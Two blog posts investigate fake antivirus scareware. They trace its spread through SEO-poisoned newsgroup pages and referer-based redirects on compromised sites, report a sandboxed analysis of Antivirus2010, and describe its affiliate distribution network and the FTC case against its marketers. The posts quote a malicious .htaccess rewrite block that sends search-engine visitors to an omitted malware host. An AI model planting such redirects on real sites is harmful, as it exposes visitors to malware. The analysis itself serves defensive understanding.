The Anti-Virus Virus Part II

Yaacov Apelbaum-ER Anti-Virus Virus

In the Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SOE’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware, (a variety of bogus anti-virus applications), is downloaded when you click on a link in a page returned by a search engine.  The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly.  If you navigate to the site via a bookmark or manually enter the address it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site and thus delay its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines, (which forms the majority of visits) will keep getting redirected to the malware download.

The underlining technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mroodsn.*$ [NC,OR]
RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, like in the following:

ErrorDocument 404 http://malewaresite-omitted/

The results of this re-route, is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access controls which result in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.

Source and Authorship
I loaded Process Monitor and installed the copy of Antivitus2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional.  The installation created an entire registry hive that included several autoruns, browser search redirects, and a root kit.  I then fired-up TCPView and examined the application’s outgoing communication.  It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev).  The domains associated with the servers were registered by which is currently hosted in Canada.

Interestingly, upon startup, the malware called the API GetKeyboardLayout checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania

If it found one, it terminated itself, further proof that the designers targeted English users.  The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

Marketing and Distribution
For software to be commercially viable, it must have effective marketing and distribution channels.  The bogus Antivirus is no exception.  It turns out that even a few US companies have been associated with the distribution of this software.  Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributers including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

The Federal Trade Commission argued that the defendants have used complex online advertising techniques that violate the fair trade law in order to push a large number of fake security or system maintenance products including ”WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and, LLC.In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called “Scareware” applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads.According to court records, as of February 11, 2009. Jain is officially listed as a fugitive from justice in the United States.Affiliate Program

The affiliate program is made up of a network of associates. Once a member the likes of Sam Jain is accepted into the program, he is given access to an enterprise control panel permitting them to distribute different flavors of malware as well as a number of techniques for infecting internet-connected computers. Affiliates can make between 58 to 90 percent commission on sales of the software. Such generous commissions can explain why these types of malware products are so popular among spammers.

Yaacov Apelbaum-Bakasoftware Control Panel 
Image 1: Bakasoftware Malware Administrative Download Control Panel

In a true testament of their feature richness, the affiliate members have access to sophisticated web based statistics dashboard. In it, the franchise owner can view KPIs that include: numbers of daily installs, number purchases by victim (and his CC number), refunds (Chargebacks), and commissions. With such access to real-time sales analytics, they can be the envy of many fortune 500 sales organizations.

Yaacov Apelbaum-Bakasoftware Sales Dashboard  
Table 1: Bakasoftware Malware Sales Dashboard

As you can see from Table 1, one affiliate installed 154,825 editions of the software in 10 days and managed to get 2,772 of those to buy the cure. Any commission sales rep will tell you that a 2% conversation rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year.

That’s some pocket change. Who says that crime doesn’t pay?

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

The Anti-Virus Virus

Yaacov Apelbaum-Anti-Virus Virus

Several weeks ago, my wife was searching online for the words to one of Shel Silverstein’s poems.  With the Internet within closer reach than the bookshelf in our den, she went to Google and typed in the key words “shel silverstein pancakes,”  and within 0.32 seconds got several matching results (Image 1).

Yaacov Apelbaum-Search Results Page

Image 1: Google Search Results

She clicked on one of the top results on the first search page and almost instantly got prompted by a message box (Image 2) indicating something to the effect that her computer contained various signs of viruses and immediately needed to be examined.  It then offered an option to perform a security scan.

Yaacov Apelbaum-Virus Message 1

Image 2: Infection Warning

We keep our OS well patched and the anti malware software up to date, so she decided to decline the offer and clicked on the cancel button.  The message box went away but then another screen popped up telling her that her system was being scanned for viruses.  Thinking that she may have clicked the OK button instead by mistake, she waited for the scan results.

Yaacov Apelbaum-Virus Scan

Image 3: Infection Warning

When the scan was complete (within 15 seconds or so), she was informed that her computer indeed had been infected with several nasty viruses (Image 3) and that she would need to download and install the offered security program in order to remove these viruses (Image 4).

Yaacov Apelbaum-Virus Download

Image 4: Malware Download Dialog Box

At that point, she realized that malware itself was communicating with her and trying to install itself on her machine.  She clicked the Cancel button dialog box but instead of terminating the installation, she was taken back to the first message box which told her again that her computer contained various signs of viruses and needed to be examined.  Essentially, she was trapped in a loop, unable to close the Browser. After another round of scans and cancelations, she decided to bring up the Task Manager and terminate the process from there.

Several days later during dinner, she happened to mention her run-in with the malware and I made a sly comment that these are the rewards we reap for hanging around dubious websites.  She took offense. “Dubious web sites?” she said, mocking me, “this was the fourth entry on the first search results page of Google. How ‘dubious’ can that be?”

I found it hard to believe that the writers of the malware were clever enough to sneak by the Google filters and make it to the top of the first search results page.  I executed the same search she did just day previous.  My search results were almost identical, but ironically her malware link had by then moved a step upwards in relevance.

Instead of clicking on the link I copied its URL and went directly to the website (Image 5)


Image 5: Actual page with download link and keywords

The web site turned out the be a newsgroup called, which is one of the most popular and most heavily advertised mailing list archives on the net.  Looking closer at the page, I found the following:

  1. At the top was the bold title “SHEL SILVERSTEIN”
  2. Below the title was a bogus poster name in the format of
  3. Next was a link which activated the malware download script.
  4. Finally at the bottom of the page was an extensive list of hundreds of keywords that were associated with the works of Shel Silverstein.

I looked at the parent directory page and found a long list of dated directories (Image 6).


Image 6: Parent Directory (note heavy commercial advertising)

Each one of these directories contained dozens of linked entries. After randomly clicking on about 30 links, I determined that most of them were identical to the Shel Silverstein page (Image 5) in terms of content, layout and malware activation functionality.  I checked out several other public newsgroups and “personal” web sites to compare. It appeared as if indeed there was a method to this madness.

Image 6: Sample directory contents with links to malware download

So what does it all mean? Well, the modus operandi seems to be as follows:

  1. The creators of the malware install the program on a large number of personal websites (some have been breached and others are dedicated). One example is Rosuto Samurai which was allegedly created to support fantasy gaming but in reality never had any content beside the malware.
  2. They then proceed to automatically create hundreds of highly popular topic pages (i.e.  Ipod, Shel Silverstein, movies, etc.) in newsgroups and mailing lists, each of which contains a link to the malware download website.
  3. Each of the pages also includes a large list of keywords (generated by some machine learning process) that are associated with the topic.  The purpose of the keyword list is to increase the radar signature for the search engine spiders.
  4. The search engines find these individual topic pages, traverse the keyword list and algorithmically determine that all the words are related.  They also see the hyperlinks and postings on each page (which makes them appear like miniature websites) and as a result assign them a top rating—which to the user, translates as top hits in topic search results.

The outcome of this strategy is cheap and effective SEO penetration and viral dissemination of viral contents (no pun intended) via top search results.

Another interesting observation—which is not without its irony—is that large vendors such as Microsoft are completely unaware of this practice and are aggressively purchasing advertising space on these sites, (including ads for their security products).  Clearly, this is being done without the realization that they are actually sharing living space with some of the most aggressive malware distribution centers.

Stay tuned, in a future posting, we will dive deeper to see who is actually developing and marketing this malware.

Quis Custodiet Ipsos Custodes?


© Copyright 2010 Yaacov Apelbaum All Rights Reserved.